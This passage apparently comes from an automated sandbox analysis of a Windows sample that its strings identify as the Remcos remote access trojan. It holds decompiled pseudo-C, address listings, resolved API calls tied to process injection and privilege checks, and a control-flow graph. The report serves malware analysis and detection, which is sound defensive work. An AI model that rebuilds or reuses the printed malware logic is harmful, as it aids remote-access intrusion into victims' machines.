                    							E004135D1(0x80000001, E00401F04(E0041B6F3( &_v780, _t498)), L"del");
                    							E00401F09();
                    							_t384 =  &_v752;
                    							E00401F09(); // executed
                    							L73:
                    							E0040DB4B(__eflags); // executed
                    							E00414B37(); // executed
                    							asm("int3");
                    							_push(_t502);
                    							_t506 = _t384 + 0x68;
                    							E0040F98D(_t285, _t506, _t506);
                    							_t303 = _t506;
                    							 *_t303 = 0x466574;
                    							 *_t303 = 0x466530;
                    							return E004351B3(_t303);
                    						} else {
                    							goto L5;
                    						}
                    					}
                    				} else {
                    					_push(__ecx);
                    					_push(__ecx);
                    					__ecx =  &_v700;
                    					__eax = E0040F9BC( &_v700, __edx, __eflags, "license_code.txt", 2);
                    					__ecx = 0x4740cc;
                    					__ecx = E00401E65(0x4740cc, __edx, __ebp, __eflags, 0x34);
                    					__edx = __eax;
                    					__ecx =  &_v720;
                    					__eax = E00410D40( &_v720, __edx, __eflags);
                    					__ecx =  &_v720;
                    					__eax = E0040F96D( &_v720, __edx, __eflags);
                    					__ecx =  &_v720;
                    					L74();
                    					0 = 1;
                    					L37:
                    					E00401FD8();
                    					return _t512;
                    				}
                    			}






























































































                    0x0040e7ce
                    0x0040e7ce
                    0x0040e7cf
                    0x0040e7dd
                    0x0040e7e2
                    0x0040e7e5
                    0x0040e7f4
                    0x0040e7f7
                    0x0040e801
                    0x0040e806
                    0x0040e810
                    0x0040e815
                    0x0040e81f
                    0x0040e828
                    0x0040e82d
                    0x0040e831
                    0x0040e83a
                    0x0040e847
                    0x0040e84d
                    0x0040e850
                    0x0040e89e
                    0x0040e89f
                    0x0040e8bc
                    0x0040e8bf
                    0x0040e8db
                    0x0040e8ed
                    0x0040e8f6
                    0x0040e8ff
                    0x0040e913
                    0x0040e922
                    0x0040e92c
                    0x0040e93d
                    0x0040e940
                    0x0040e947
                    0x0040e94e
                    0x0040e953
                    0x0040e956
                    0x0040e95d
                    0x0040e964
                    0x0040e9b7
                    0x0040e9bb
                    0x0040e9bf
                    0x0040e9c4
                    0x0040e9c9
                    0x0040e9cb
                    0x0040e9d0
                    0x0040e9d2
                    0x0040e9e8
                    0x0040e9ea
                    0x0040e9f0
                    0x0040e9f1
                    0x0040e9f3
                    0x0040ea04
                    0x0040ea06
                    0x0040ea0b
                    0x0040ea0b
                    0x0040e9f3
                    0x0040ea0c
                    0x0040ea11
                    0x0040ea13
                    0x0040ea1c
                    0x0040ea21
                    0x0040ea23
                    0x0040ea25
                    0x0040ea25
                    0x0040ea27
                    0x0040ea2c
                    0x0040ea31
                    0x0040ea33
                    0x0040ea37
                    0x0040ea37
                    0x0040ea3c
                    0x0040ea40
                    0x0040ea47
                    0x0040ea49
                    0x0040ea4b
                    0x0040ea50
                    0x0040ea50
                    0x0040ea65
                    0x0040ea68
                    0x0040ea6a
                    0x0040ea70
                    0x0040ea72
                    0x0040ea78
                    0x0040ea7a
                    0x0040ea7a
                    0x0040ea78
                    0x0040ea70
                    0x0040ea68
                    0x0040ea8f
                    0x0040ea92
                    0x0040ea94
                    0x0040ea94
                    0x0040eaa2
                    0x0040eab3
                    0x0040eabc
                    0x0040ead5
                    0x0040ead8
                    0x0040eaef
                    0x0040eaf2
                    0x0040eb08
                    0x0040eb0b
                    0x0040eb1e
                    0x0040eb21
                    0x0040eb3a
                    0x0040eb3c
                    0x0040eb49
                    0x0040eb5e
                    0x0040eb63
                    0x0040eb76
                    0x0040eb7f
                    0x0040eb84
                    0x0040eb84
                    0x0040eb3c
                    0x0040eb89
                    0x0040eb8d
                    0x0040ed1e
                    0x0040ed26
                    0x0040ed2d
                    0x0040ed35
                    0x0040ed53
                    0x0040ed55
                    0x0040ed5a
                    0x0040ed6a
                    0x0040ed6f
                    0x00000000
                    0x0040eb93
                    0x0040eb93
                    0x0040eb9a
                    0x0040ec22
                    0x0040eb9c
                    0x0040eba7
                    0x0040ebc2
                    0x0040ebcb
                    0x0040ebd0
                    0x0040ebd2
                    0x0040ebd7
                    0x0040ebf4
                    0x0040ec0e
                    0x0040ec13
                    0x0040ec13
                    0x0040ec2c
                    0x0040ec36
                    0x0040ec3e
                    0x0040ec40
                    0x0040ec46
                    0x0040ec49
                    0x0040ec4b
                    0x0040ec5a
                    0x0040ec4d
                    0x0040ec50
                    0x0040ec55
                    0x0040ec55
                    0x0040ec68
                    0x0040ec6e
                    0x0040ec75
                    0x0040ec7d
                    0x0040ec88
                    0x0040eca7
                    0x0040ecad
                    0x0040ecb2
                    0x0040ecb5
                    0x0040ecbe
                    0x0040ecc3
                    0x0040eccf
                    0x0040ecd1
                    0x0040ed74
                    0x0040ed74
                    0x0040ed81
                    0x0040ed86
                    0x0040ed8c
                    0x0040ed91
                    0x0040eda0
                    0x0040eda2
                    0x0040eda7
                    0x0040edbb
                    0x0040edc0
                    0x0040edc6
                    0x0040edc8
                    0x0040ede5
                    0x0040ede7
                    0x0040eded
                    0x0040ede9
                    0x0040ede9
                    0x00000000
                    0x0040ede9
                    0x0040edca
                    0x0040edca
                    0x0040edcc
                    0x0040edcc
                    0x0040eddb
                    0x0040ede1
                    0x0040ede1
                    0x0040edf3
                    0x0040edfd
                    0x0040ee02
                    0x0040ee0c
                    0x0040ee11
                    0x0040ee16
                    0x0040ee24
                    0x0040ee36
                    0x0040ee3b
                    0x0040ee3d
                    0x0040ee5c
                    0x0040ee6e
                    0x0040ee7f
                    0x0040ee94
                    0x0040eeb7
                    0x0040eecc
                    0x0040eecf
                    0x0040ef0a
                    0x0040ef0a
                    0x0040eed1
                    0x0040eed3
                    0x0040eeda
                    0x0040eedc
                    0x0040eee6
                    0x0040eeed
                    0x0040eef7
                    0x0040ef03
                    0x0040ef06
                    0x0040ef06
                    0x0040ef0c
                    0x0040ef21
                    0x0040ef24
                    0x0040ef28
                    0x0040ef2f
                    0x0040ef39
                    0x0040ef41
                    0x0040ef43
                    0x0040ef4b
                    0x0040ef54
                    0x0040ef54
                    0x0040ef58
                    0x0040ef5b
                    0x0040ef5d
                    0x0040ef5d
                    0x0040ef72
                    0x0040ef75
                    0x0040ef7b
                    0x0040ef89
                    0x0040ef9e
                    0x0040efa3
                    0x0040efb6
                    0x0040efbf
                    0x0040efce
                    0x0040efd0
                    0x0040efd0
                    0x0040efe5
                    0x0040efe8
                    0x0040f001
                    0x0040f010
                    0x0040f015
                    0x0040f018
                    0x0040f01b
                    0x0040f01e
                    0x0040f01e
                    0x0040f027
                    0x0040f032
                    0x0040f03b
                    0x0040f040
                    0x0040f045
                    0x0040f047
                    0x0040f04a
                    0x0040f04a
                    0x0040f056
                    0x0040f058
                    0x0040f05f
                    0x0040f06b
                    0x0040f06b
                    0x0040f06d
                    0x0040f074
                    0x0040f080
                    0x0040f080
                    0x0040f082
                    0x0040f087
                    0x0040f087
                    0x0040f089
                    0x0040f097
                    0x00000000
                    0x0040f08b
                    0x0040f08b
                    0x0040f08e
                    0x0040f090
                    0x0040f09c
                    0x0040f0b0
                    0x0040f0bf
                    0x0040f0c4
                    0x0040f0d0
                    0x0040f0d0
                    0x0040f08e
                    0x0040f0d5
                    0x0040f0e8
                    0x0040f0ed
                    0x0040f0ee
                    0x0040f0f0
                    0x0040f117
                    0x0040f122
                    0x0040f12b
                    0x0040f130
                    0x0040f14f
                    0x0040f150
                    0x0040f152
                    0x0040f154
                    0x00000000
                    0x00000000
                    0x0040f138
                    0x0040f13b
                    0x0040f13f
                    0x0040f13f
                    0x0040f140
                    0x0040f14a
                    0x00000000
                    0x0040f14a
                    0x00000000
                    0x0040f13b
                    0x00000000
                    0x0040f156
                    0x00000000
                    0x0040ecd7
                    0x0040ecdb
                    0x0040ece0
                    0x0040ece3
                    0x0040ece7
                    0x0040ecec
                    0x0040ecf1
                    0x0040ecf4
                    0x0040ecf6
                    0x00000000
                    0x0040ecf8
                    0x0040ecf8
                    0x00000000
                    0x0040ecf8
                    0x0040ecf6
                    0x0040ecd1
                    0x0040ea15
                    0x0040ea15
                    0x0040ecfa
                    0x0040ecfa
                    0x00000000
                    0x0040ecfa
                    0x0040e966
                    0x0040e980
                    0x0040e989
                    0x0040e992
                    0x0040e9a6
                    0x0040e9af
                    0x0040e9b1
                    0x0040f169
                    0x0040f173
                    0x0040f178
                    0x0040f196
                    0x0040f1a0
                    0x0040f1a5
                    0x0040f1a9
                    0x0040f1ae
                    0x0040f1ae
                    0x0040f1b3
                    0x0040f1b8
                    0x0040f1b9
                    0x0040f1ba
                    0x0040f1bf
                    0x0040f1c4
                    0x004104e0
                    0x0040e696
                    0x0040e6a2
                    0x00000000
                    0x00000000
                    0x00000000
                    0x0040e9b1
                    0x0040e852
                    0x0040e852
                    0x0040e853
                    0x0040e85b
                    0x0040e85f
                    0x0040e866
                    0x0040e870
                    0x0040e877
                    0x0040e879
                    0x0040e87d
                    0x0040e882
                    0x0040e886
                    0x0040e88b
                    0x0040e88f
                    0x0040e896
                    0x0040ecfb
                    0x0040ecff
                    0x0040ed0c
                    0x0040ed0c

                    APIs
                      • Part of subcall function 0041C5E5: LoadLibraryA.KERNEL32(Psapi.dll,GetProcessImageFileNameW,?,?,?,?,0040E7EA), ref: 0041C5FA
                      • Part of subcall function 0041C5E5: GetProcAddress.KERNEL32(00000000), ref: 0041C603
                      • Part of subcall function 0041C5E5: GetModuleHandleA.KERNEL32(Kernel32.dll,GetProcessImageFileNameW,?,?,?,?,0040E7EA), ref: 0041C61A
                      • Part of subcall function 0041C5E5: GetProcAddress.KERNEL32(00000000), ref: 0041C61D
                      • Part of subcall function 0041C5E5: GetModuleHandleA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,?,0040E7EA), ref: 0041C62E
                      • Part of subcall function 0041C5E5: GetProcAddress.KERNEL32(00000000), ref: 0041C631
                      • Part of subcall function 0041C5E5: GetModuleHandleA.KERNEL32(user32,SetProcessDpiAware,?,?,?,?,0040E7EA), ref: 0041C646
                      • Part of subcall function 0041C5E5: GetProcAddress.KERNEL32(00000000), ref: 0041C649
                      • Part of subcall function 0041C5E5: LoadLibraryA.KERNEL32(ntdll.dll,NtUnmapViewOfSection,?,?,?,?,0040E7EA), ref: 0041C65A
                      • Part of subcall function 0041C5E5: GetProcAddress.KERNEL32(00000000), ref: 0041C65D
                      • Part of subcall function 0041C5E5: LoadLibraryA.KERNEL32(kernel32.dll,GlobalMemoryStatusEx,?,?,?,?,0040E7EA), ref: 0041C669
                      • Part of subcall function 0041C5E5: GetProcAddress.KERNEL32(00000000), ref: 0041C66C
                      • Part of subcall function 0041C5E5: GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,?,0040E7EA), ref: 0041C67E
                      • Part of subcall function 0041C5E5: GetProcAddress.KERNEL32(00000000), ref: 0041C681
                      • Part of subcall function 0041C5E5: GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,?,0040E7EA), ref: 0041C68E
                      • Part of subcall function 0041C5E5: GetProcAddress.KERNEL32(00000000), ref: 0041C691
                      • Part of subcall function 0041C5E5: LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,?,0040E7EA), ref: 0041C6A2
                      • Part of subcall function 0041C5E5: GetProcAddress.KERNEL32(00000000), ref: 0041C6A5
                      • Part of subcall function 0041C5E5: GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,?,0040E7EA), ref: 0041C6B2
                      • Part of subcall function 0041C5E5: GetProcAddress.KERNEL32(00000000), ref: 0041C6B5
                      • Part of subcall function 0041C5E5: GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,?,0040E7EA), ref: 0041C6C7
                      • Part of subcall function 0041C5E5: GetProcAddress.KERNEL32(00000000), ref: 0041C6CA
                      • Part of subcall function 0041C5E5: GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,?,0040E7EA), ref: 0041C6D7
                      • Part of subcall function 0041C5E5: GetProcAddress.KERNEL32(00000000), ref: 0041C6DA
                      • Part of subcall function 0041C5E5: GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,?,0040E7EA), ref: 0041C6E7
                      • Part of subcall function 0041C5E5: GetProcAddress.KERNEL32(00000000), ref: 0041C6EA
                      • Part of subcall function 0041C5E5: GetModuleHandleA.KERNEL32(kernel32.dll,GetSystemTimes,?,?,?,?,0040E7EA), ref: 0041C6FC
                      • Part of subcall function 0041C5E5: GetProcAddress.KERNEL32(00000000), ref: 0041C6FF
                    • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\BiU282bjyR.exe,00000104), ref: 0040E7F7
                      • Part of subcall function 00410D40: __EH_prolog.LIBCMT ref: 00410D45
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.638058832.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                    • Associated: 00000000.00000002.638058832.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.638058832.0000000000477000.00000040.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_400000_BiU282bjyR.jbxd
                    Yara matches
                    Similarity
                    • API ID: AddressProc$Module$Handle$LibraryLoad$FileH_prologName
                    • String ID: CG$ CG$8CG$Access Level: $Administrator$C:\Users\user\Desktop\BiU282bjyR.exe$EGiy6hf-YWJYTZ$Exe$Exe$Inj$L=G$Remcos Agent initialized$Software\$User$X2}$del$del$exepath$licence$license_code.txt
                    • API String ID: 2830904901-3257157931
                    • Opcode ID: 7428784d029ac5524be4bd8f894b01a48f93e601419a636f50ac086fb443412a
                    • Instruction ID: 3bc9287be6106f1ab30f5026361a03c820ff81cbb784d49c0da613b5e4bff8c3
                    • Opcode Fuzzy Hash: 7428784d029ac5524be4bd8f894b01a48f93e601419a636f50ac086fb443412a
                    • Instruction Fuzzy Hash: 1B32D560B042416ADA24B7768C67B7E26998FC1748F40483FB5467B2E3EF7C8D45839E
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 1082 448b9f-448bc7 call 4487de call 44883c 1087 448d67-448d69 1082->1087 1088 448bcd-448bd9 call 4487e4 1082->1088 1090 448d6e call 43b6dd 1087->1090 1088->1087 1093 448bdf-448bea 1088->1093 1092 448d73-448d9c call 4487de call 44883c 1090->1092 1112 448ec4 1092->1112 1113 448da2-448dae call 4487e4 1092->1113 1095 448c20-448c29 call 446172 1093->1095 1096 448bec-448bee 1093->1096 1107 448c2c-448c31 1095->1107 1100 448bf0-448bf4 1096->1100 1103 448bf6-448bf8 1100->1103 1104 448c10-448c12 1100->1104 1108 448c0c-448c0e 1103->1108 1109 448bfa-448c00 1103->1109 1105 448c15-448c17 1104->1105 1110 448d61-448d66 1105->1110 1111 448c1d 1105->1111 1107->1107 1114 448c33-448c54 call 445b29 call 446172 1107->1114 1108->1105 1109->1104 1115 448c02-448c0a 1109->1115 1111->1095 1116 448ec9 call 43b6dd 1112->1116 1113->1112 1123 448db4-448dc0 call 448810 1113->1123 1114->1110 1130 448c5a-448c5d 1114->1130 1115->1100 1115->1108 1119 448ece-448f20 call 43baa5 1116->1119 1131 448f22-448f28 1119->1131 1132 448f2a-448f2d 1119->1132 1123->1112 1133 448dc6-448de7 call 446172 GetTimeZoneInformation 1123->1133 1134 448c60-448c65 1130->1134 1135 448f70-448f82 1131->1135 1132->1135 1136 448f2f-448f3f call 445b29 1132->1136 1149 448ea0-448ec3 call 4487d8 call 4487cc call 4487d2 1133->1149 1150 448ded-448e0e 1133->1150 1134->1134 1138 448c67-448c79 call 44141e 1134->1138 1140 448f84-448f87 1135->1140 1141 448f92 1135->1141 1153 448f41 1136->1153 1154 448f49-448f62 call 43baa5 1136->1154 1138->1087 1152 448c7f-448c92 call 441413 1138->1152 1140->1141 1148 448f89-448f8a call 448b9f 1140->1148 1146 448f97-448fae call 446172 call 4349bb 1141->1146 1147 448f92 call 448d74 1141->1147 1147->1146 1163 448f8f-448f90 1148->1163 1157 448e10-448e15 1150->1157 1158 448e18-448e1f 1150->1158 1152->1087 1177 448c98-448c9b 1152->1177 1161 448f42-448f47 call 446172 1153->1161 1179 448f64-448f65 1154->1179 1180 448f67-448f6d call 446172 1154->1180 1157->1158 1165 448e37-448e3a 1158->1165 1166 448e21-448e28 1158->1166 1185 448f6f 1161->1185 1163->1146 1169 448e3d-448e5e call 4456f8 WideCharToMultiByte 1165->1169 1166->1165 1167 448e2a-448e35 1166->1167 1167->1169 1188 448e60-448e63 1169->1188 1189 448e6c-448e6e 1169->1189 1183 448ca3-448cac 1177->1183 1184 448c9d-448ca1 1177->1184 1179->1161 1180->1185 1190 448cae 1183->1190 1191 448caf-448cbc call 43b4a1 1183->1191 1184->1177 1184->1183 1185->1135 1188->1189 1193 448e65-448e6a 1188->1193 1194 448e70-448e8c WideCharToMultiByte 1189->1194 1190->1191 1200 448cbf-448cc3 1191->1200 1193->1194 1196 448e8e-448e91 1194->1196 1197 448e9b-448e9e 1194->1197 1196->1197 1199 448e93-448e99 1196->1199 1197->1149 1199->1149 1201 448cc5-448cc7 1200->1201 1202 448ccd-448cce 1200->1202 1203 448cd0-448cd3 1201->1203 1204 448cc9-448ccb 1201->1204 1202->1200 1205 448cd5-448ce8 call 43b4a1 1203->1205 1206 448d17-448d19 1203->1206 1204->1202 1204->1203 1214 448cef-448cf3 1205->1214 1208 448d20-448d2f 1206->1208 1209 448d1b-448d1d 1206->1209 1210 448d47-448d4a 1208->1210 1211 448d31-448d39 call 441413 1208->1211 1209->1208 1215 448d4d-448d5f call 4487d8 call 4487cc 1210->1215 1216 448d3e-448d43 1211->1216 1217 448cf5-448cf8 1214->1217 1218 448cea-448cec 1214->1218 1215->1110 1216->1215 1220 448d45 1216->1220 1217->1206 1222 448cfa-448d0a call 43b4a1 1217->1222 1218->1217 1221 448cee 1218->1221 1220->1087 1221->1214 1228 448d11-448d15 1222->1228 1228->1206 1229 448d0c-448d0e 1228->1229 1229->1206 1230 448d10 1229->1230 1230->1228
                    C-Code - Quality: 76%
                    			E00448B9F(void* __ebx, void* __edi, signed int __esi, void* __eflags, signed int _a4) {
                    				signed int _v8;
                    				signed int _v12;
                    				int _v16;
                    				int _v20;
                    				int _v24;
                    				void* _v52;
                    				int _v56;
                    				int _v60;
                    				signed int _v100;
                    				char _v272;
                    				intOrPtr _v276;
                    				char _v280;
                    				char _v356;
                    				char _v360;
                    				void* __ebp;
                    				signed int _t65;
                    				signed int _t72;
                    				signed int _t74;
                    				signed int _t78;
                    				signed int _t85;
                    				signed int _t89;
                    				signed int _t91;
                    				long _t93;
                    				signed int* _t96;
                    				signed int _t99;
                    				signed int _t102;
                    				signed int _t106;
                    				void* _t113;
                    				signed int _t116;
                    				void* _t117;
                    				void* _t119;
                    				void* _t120;
                    				void* _t122;
                    				signed int _t124;
                    				signed int _t125;
                    				signed int* _t128;
                    				signed int _t129;
                    				void* _t132;
                    				void* _t134;
                    				signed int _t135;
                    				signed int _t137;
                    				void* _t140;
                    				intOrPtr _t141;
                    				void* _t143;
                    				signed int _t150;
                    				signed int _t151;
                    				signed int _t154;
                    				signed int _t158;
                    				signed int _t161;
                    				intOrPtr* _t166;
                    				signed int _t167;
                    				intOrPtr* _t168;
                    				void* _t169;
                    				intOrPtr _t170;
                    				void* _t171;
                    				signed int _t172;
                    				int _t176;
                    				signed int _t178;
                    				char** _t179;
                    				signed int _t183;
                    				signed int _t184;
                    				void* _t191;
                    				signed int _t192;
                    				void* _t193;
                    				signed int _t194;
                    
                    				_t178 = __esi;
                    				_t171 = __edi;
                    				_t65 = E004487DE();
                    				_v8 = _v8 & 0x00000000;
                    				_t137 = _t65;
                    				_v16 = _v16 & 0x00000000;
                    				_v12 = _t137;
                    				if(E0044883C( &_v8) != 0 || E004487E4( &_v16) != 0) {
                    					L46:
                    					_push(0);
                    					_push(0);
                    					_push(0);
                    					_push(0);
                    					_push(0);
                    					E0043B6DD();
                    					asm("int3");
                    					_t191 = _t193;
                    					_t194 = _t193 - 0x10;
                    					_push(_t137);
                    					_t179 = E004487DE();
                    					_t32 =  &_v52; // 0x45e224
                    					_v52 = 0;
                    					_v56 = 0;
                    					_v60 = 0;
                    					_t72 = E0044883C(_t32);
                    					_t143 = _t178;
                    					__eflags = _t72;
                    					if(_t72 != 0) {
                    						L66:
                    						_push(0);
                    						_push(0);
                    						_push(0);
                    						_push(0);
                    						_push(0);
                    						E0043B6DD();
                    						asm("int3");
                    						_push(_t191);
                    						_t192 = _t194;
                    						_t74 =  *0x47000c; // 0xc3a97826
                    						_v100 = _t74 ^ _t192;
                    						 *0x470344 =  *0x470344 | 0xffffffff;
                    						 *0x470338 =  *0x470338 | 0xffffffff;
                    						_push(0);
                    						_push(_t179);
                    						_push(_t171);
                    						_t139 = "TZ";
                    						_t172 = 0;
                    						 *0x471758 = 0;
                    						_t78 = E0043BAA5(__eflags,  &_v360,  &_v356, 0x100, "TZ");
                    						__eflags = _t78;
                    						if(_t78 != 0) {
                    							__eflags = _t78 - 0x22;
                    							if(_t78 == 0x22) {
                    								_t184 = E00445B29(_t143, _v276);
                    								__eflags = _t184;
                    								if(__eflags != 0) {
                    									_t85 = E0043BAA5(__eflags,  &_v280, _t184, _v276, _t139);
                    									__eflags = _t85;
                    									if(_t85 == 0) {
                    										E00446172(0);
                    										_t172 = _t184;
                    									} else {
                    										_push(_t184);
                    										goto L72;
                    									}
                    								} else {
                    									_push(0);
                    									L72:
                    									E00446172();
                    								}
                    							}
                    						} else {
                    							_t172 =  &_v272;
                    						}
                    						asm("sbb esi, esi");
                    						_t183 =  ~(_t172 -  &_v272) & _t172;
                    						__eflags = _t172;
                    						if(_t172 == 0) {
                    							L80:
                    							L47();
                    						} else {
                    							__eflags =  *_t172;
                    							if(__eflags == 0) {
                    								goto L80;
                    							} else {
                    								_push(_t172);
                    								E00448B9F(_t139, _t172, _t183, __eflags);
                    							}
                    						}
                    						E00446172(_t183);
                    						__eflags = _v16 ^ _t192;
                    						return E004349BB(_v16 ^ _t192);
                    					} else {
                    						_t89 = E004487E4( &_v16);
                    						_pop(_t143);
                    						__eflags = _t89;
                    						if(_t89 != 0) {
                    							goto L66;
                    						} else {
                    							_t91 = E00448810( &_v20);
                    							_pop(_t143);
                    							__eflags = _t91;
                    							if(_t91 != 0) {
                    								goto L66;
                    							} else {
                    								E00446172( *0x471750);
                    								 *0x471750 = 0;
                    								 *_t194 = 0x471760;
                    								_t93 = GetTimeZoneInformation(??);
                    								__eflags = _t93 - 0xffffffff;
                    								if(_t93 != 0xffffffff) {
                    									_t150 =  *0x471760 * 0x3c;
                    									_t167 =  *0x4717b4; // 0x0
                    									_push(_t171);
                    									 *0x471758 = 1;
                    									_v12 = _t150;
                    									__eflags =  *0x4717a6; // 0x0
                    									if(__eflags != 0) {
                    										_t151 = _t150 + _t167 * 0x3c;
                    										__eflags = _t151;
                    										_v12 = _t151;
                    									}
                    									__eflags =  *0x4717fa; // 0x0
                    									if(__eflags == 0) {
                    										L56:
                    										_v16 = 0;
                    										_v20 = 0;
                    									} else {
                    										_t106 =  *0x471808; // 0x0
                    										__eflags = _t106;
                    										if(_t106 == 0) {
                    											goto L56;
                    										} else {
                    											_v16 = 1;
                    											_v20 = (_t106 - _t167) * 0x3c;
                    										}
                    									}
                    									_t176 = E004456F8(0, _t167);
                    									_t99 = WideCharToMultiByte(_t176, 0, 0x471764, 0xffffffff,  *_t179, 0x3f, 0,  &_v24);
                    									__eflags = _t99;
                    									if(_t99 == 0) {
                    										L60:
                    										 *( *_t179) = 0;
                    									} else {
                    										__eflags = _v24;
                    										if(_v24 != 0) {
                    											goto L60;
                    										} else {
                    											( *_t179)[0x3f] = 0;
                    										}
                    									}
                    									_t102 = WideCharToMultiByte(_t176, 0, 0x4717b8, 0xffffffff, _t179[1], 0x3f, 0,  &_v24);
                    									__eflags = _t102;
                    									if(_t102 == 0) {
                    										L64:
                    										 *(_t179[1]) = 0;
                    									} else {
                    										__eflags = _v24;
                    										if(_v24 != 0) {
                    											goto L64;
                    										} else {
                    											_t179[1][0x3f] = 0;
                    										}
                    									}
                    								}
                    								 *(E004487D8()) = _v12;
                    								 *((intOrPtr*)(E004487CC())) = _v16;
                    								_t96 = E004487D2();
                    								 *_t96 = _v20;
                    								return _t96;
                    							}
                    						}
                    					}
                    				} else {
                    					_t168 =  *0x471750; // 0x0
                    					_t178 = _a4;
                    					if(_t168 == 0) {
                    						L12:
                    						E00446172(_t168);
                    						_t154 = _t178;
                    						_t12 = _t154 + 1; // 0x448f90
                    						_t169 = _t12;
                    						do {
                    							_t113 =  *_t154;
                    							_t154 = _t154 + 1;
                    						} while (_t113 != 0);
                    						_t13 = _t154 - _t169 + 1; // 0x448f91
                    						 *0x471750 = E00445B29(_t154 - _t169, _t13);
                    						_t116 = E00446172(0);
                    						_t170 =  *0x471750; // 0x0
                    						if(_t170 == 0) {
                    							goto L45;
                    						} else {
                    							_t158 = _t178;
                    							_push(_t171);
                    							_t14 = _t158 + 1; // 0x448f90
                    							_t171 = _t14;
                    							do {
                    								_t117 =  *_t158;
                    								_t158 = _t158 + 1;
                    							} while (_t117 != 0);
                    							_t15 = _t158 - _t171 + 1; // 0x448f91
                    							_t119 = E0044141E(_t170, _t15, _t178);
                    							_t193 = _t193 + 0xc;
                    							if(_t119 == 0) {
                    								_t171 = 3;
                    								_push(_t171);
                    								_t120 = E00441413(_t159,  *_t137, 0x40, _t178);
                    								_t193 = _t193 + 0x10;
                    								if(_t120 == 0) {
                    									while( *_t178 != 0) {
                    										_t178 = _t178 + 1;
                    										_t171 = _t171 - 1;
                    										if(_t171 != 0) {
                    											continue;
                    										}
                    										break;
                    									}
                    									_pop(_t171);
                    									_t137 = _t137 & 0xffffff00 |  *_t178 == 0x0000002d;
                    									if(_t137 != 0) {
                    										_t178 = _t178 + 1;
                    									}
                    									_t161 = E0043B4A1(_t159, _t178) * 0xe10;
                    									_v8 = _t161;
                    									while(1) {
                    										_t122 =  *_t178;
                    										if(_t122 != 0x2b && (_t122 < 0x30 || _t122 > 0x39)) {
                    											break;
                    										}
                    										_t178 = _t178 + 1;
                    									}
                    									__eflags =  *_t178 - 0x3a;
                    									if( *_t178 == 0x3a) {
                    										_t178 = _t178 + 1;
                    										_t161 = _v8 + E0043B4A1(_t161, _t178) * 0x3c;
                    										_v8 = _t161;
                    										while(1) {
                    											_t132 =  *_t178;
                    											__eflags = _t132 - 0x30;
                    											if(_t132 < 0x30) {
                    												break;
                    											}
                    											__eflags = _t132 - 0x39;
                    											if(_t132 <= 0x39) {
                    												_t178 = _t178 + 1;
                    												__eflags = _t178;
                    												continue;
                    											}
                    											break;
                    										}
                    										__eflags =  *_t178 - 0x3a;
                    										if( *_t178 == 0x3a) {
                    											_t178 = _t178 + 1;
                    											_t161 = _v8 + E0043B4A1(_t161, _t178);
                    											_v8 = _t161;
                    											while(1) {
                    												_t134 =  *_t178;
                    												__eflags = _t134 - 0x30;
                    												if(_t134 < 0x30) {
                    													goto L38;
                    												}
                    												__eflags = _t134 - 0x39;
                    												if(_t134 <= 0x39) {
                    													_t178 = _t178 + 1;
                    													__eflags = _t178;
                    													continue;
                    												}
                    												goto L38;
                    											}
                    										}
                    									}
                    									L38:
                    									__eflags = _t137;
                    									if(_t137 != 0) {
                    										_v8 = _t161;
                    									}
                    									__eflags =  *_t178;
                    									_t124 = 0 |  *_t178 != 0x00000000;
                    									_v16 = _t124;
                    									__eflags = _t124;
                    									_t125 = _v12;
                    									if(_t124 == 0) {
                    										_t29 = _t125 + 4; // 0xfffffddd
                    										 *((char*)( *_t29)) = 0;
                    										L44:
                    										 *(E004487D8()) = _v8;
                    										_t128 = E004487CC();
                    										 *_t128 = _v16;
                    										return _t128;
                    									}
                    									_push(3);
                    									_t28 = _t125 + 4; // 0xfffffddd, executed
                    									_t129 = E00441413(_t161,  *_t28, 0x40, _t178); // executed
                    									_t193 = _t193 + 0x10;
                    									__eflags = _t129;
                    									if(_t129 == 0) {
                    										goto L44;
                    									}
                    								}
                    							}
                    							goto L46;
                    						}
                    					} else {
                    						_t166 = _t168;
                    						_t135 = _t178;
                    						while(1) {
                    							_t140 =  *_t135;
                    							if(_t140 !=  *_t166) {
                    								break;
                    							}
                    							if(_t140 == 0) {
                    								L8:
                    								_t116 = 0;
                    							} else {
                    								_t9 = _t135 + 1; // 0xdde805eb
                    								_t141 =  *_t9;
                    								if(_t141 !=  *((intOrPtr*)(_t166 + 1))) {
                    									break;
                    								} else {
                    									_t135 = _t135 + 2;
                    									_t166 = _t166 + 2;
                    									if(_t141 != 0) {
                    										continue;
                    									} else {
                    										goto L8;
                    									}
                    								}
                    							}
                    							L10:
                    							if(_t116 == 0) {
                    								L45:
                    								return _t116;
                    							} else {
                    								_t137 = _v12;
                    								goto L12;
                    							}
                    							goto L82;
                    						}
                    						asm("sbb eax, eax");
                    						_t116 = _t135 | 0x00000001;
                    						__eflags = _t116;
                    						goto L10;
                    					}
                    				}
                    				L82:
                    			}




































































                    0x00448b9f
                    0x00448b9f
                    0x00448ba9
                    0x00448bae
                    0x00448bb2
                    0x00448bb4
                    0x00448bbc
                    0x00448bc7
                    0x00448d67
                    0x00448d69
                    0x00448d6a
                    0x00448d6b
                    0x00448d6c
                    0x00448d6d
                    0x00448d6e
                    0x00448d73
                    0x00448d77
                    0x00448d79
                    0x00448d7c
                    0x00448d83
                    0x00448d87
                    0x00448d8a
                    0x00448d8e
                    0x00448d91
                    0x00448d94
                    0x00448d99
                    0x00448d9a
                    0x00448d9c
                    0x00448ec4
                    0x00448ec4
                    0x00448ec5
                    0x00448ec6
                    0x00448ec7
                    0x00448ec8
                    0x00448ec9
                    0x00448ece
                    0x00448ed1
